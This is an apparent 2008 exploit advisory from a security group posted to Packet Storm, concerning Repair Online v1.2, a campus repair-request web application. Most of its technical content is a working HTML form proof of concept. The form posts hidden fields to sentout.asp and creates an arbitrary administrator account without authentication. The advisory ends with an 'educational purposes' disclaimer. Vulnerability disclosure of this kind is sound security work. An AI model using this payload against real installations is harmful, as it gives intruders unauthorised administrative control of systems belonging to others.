repaironline-admin.txt

2008-05-27T00:00:00
ID PACKETSTORM:66699
Type packetstorm
Reporter unohope
Modified 2008-05-27T00:00:00

Description

                                        
                                            ` _____ _ _ _____ _____ _____ _____   
/ ___| |_| | _ \| _ | _ |_ _|   
| (___| _ | [_)_/| (_) | (_) | | |   
\_____|_| |_|_| |_||_____|_____| |_|   
C. H. R. O. O. T. SECURITY GROUP  
- -- ----- --- -- -- ---- --- -- -   
http://www.chroot.org  
  
_ _ _ _____ ____ ____ __ _   
Hacks In Taiwan | |_| | |_ _| __| | \| |  
Conference 2008 | _ | | | | | (__| () | |  
|_| |_|_| |_| \____|____|_|\__|  
http://www.hitcon.org  
  
  
Title :: Repair Online v1.2 (sentout) Create Admin Vulnerability  
  
Author :: unohope [at] chroot [dot] org  
  
IRC :: irc.chroot.org #chroot  
  
ScriptName :: 校園報修系統 v1.2  
  
  
Download :: http://netlab.kh.edu.tw/download/線上報修系統v12.exe  
  
Mirror :: http://www.files.to/get/280246/c8pqqs4ug0  
  
______________  
[Create Admin]  
  
- {sentout.asp} -  
  
<form action="http://localhost/repair/pwd/sentout.asp" method="post">  
user: <input type="text" name="pID" value="adm2"><br>  
pass: <input type="text" name="Pwd" value="123456">  
<input type="hidden" name="pFrom" value="N/A">  
<input type="hidden" name="pName" value="N/A">  
<input type="hidden" name="pTag" value="z,repair,leader">  
<input type="submit" value="add">  
</form>  
  
It didn't check out anything else,   
We just create a new administrator account arbitrarily,  
... *faint*  
  
______  
[NOTE]  
  
!! This is just for educational purposes, DO NOT use for illegal. !!  
  
  
# 2008/5/24 - chrO.ot group #  
`